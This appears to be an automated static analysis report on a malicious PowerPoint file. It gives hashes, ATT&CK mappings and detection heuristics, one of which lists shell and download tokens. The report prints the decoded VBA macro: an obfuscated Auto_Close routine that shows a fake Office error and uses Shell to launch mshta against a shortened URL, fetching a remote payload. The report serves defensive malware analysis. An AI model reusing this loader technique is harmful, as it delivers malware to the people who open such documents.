Malicious Office (OLE) / .PPT — malware analysis report

Static analysis result for SHA-256 62ed8a07014021d3…

Verdict: MALICIOUS

File type: Office (OLE) / .PPT

Size: 92.5 KB
Created: 2006-08-16 00:00:00
Authoring application: Microsoft Office PowerPoint
First seen: 2026-05-13
MD5: ac3faaeac653ebeb603650459dfc965b
SHA-1: 2d57f3647a629839f48613b819d92447ba052d70
SHA-256: 62ed8a07014021d33ac22731885a5530fef8ec2d871df62a2ab79a9b860f7085
Risk score: 128

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The critical heuristic 'OLE_VBA_SHELL' and the high heuristic 'OLE_VBA_PCODE_AUTOEXEC_EXEC' together indicate a potentially malicious Shell call within the VBA macros. The Auto_Close macro builds a command string from several string fragments, launches 'WINWORD', and concatenates a URL into the command it executes. This suggests the macro is designed to download and execute a second-stage payload when the document is closed.

Heuristics (4)

  • VBA macros detected (medium, 3 related findings) [OLE_VBA_MACROS]
    Document contains VBA macro code.
  • Potential Shell call in VBA (critical) [OLE_VBA_SHELL]
    Potential Shell call in VBA.
    Matched line in script:
    MsgBox ("Office 365 Not installed!"): Shell ("WINWORD"): Shell (WINWORD + MsgBoxOláMundo¨¨¨¨M_S)
  • VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Auto_Close macro (low) [OLE_VBA_AUTOCLOSE]
    Auto_Close macro.
    Matched line in script:
    Sub Auto_Close()

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 540 bytes
SHA-256: 6d8d75469f94b5ad050f1c137899ab6f19b63a899f2ad7487188eb10dce8afa2

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Module1"
Sub Auto_Close()

¨¨¨¨PDf_3¨¨¨¨¨¨¨¨¨¨ = "jasdoaksdosasdkdkodk"

¨¨¨¨PDf_2¨¨¨¨¨¨¨¨¨¨ = "tp://1230912489%1230192309@j.mp/"

¨¨¨¨PDf_1¨¨ = "hta"" ht"

¨¨¨¨PDf¨¨¨¨¨¨¨¨ = """ms"

MsgBoxOláMundo¨¨¨¨M_S = ¨¨¨¨PDf¨¨¨¨¨¨¨¨ + ¨¨¨¨PDf_1¨¨ + ¨¨¨¨PDf_2¨¨¨¨¨¨¨¨¨¨ + ¨¨¨¨PDf_3¨¨¨¨¨¨¨¨¨¨
MsgBox ("Office 365 Not installed!"): Shell ("WINWORD"): Shell (WINWORD + MsgBoxOláMundo¨¨¨¨M_S)

End Sub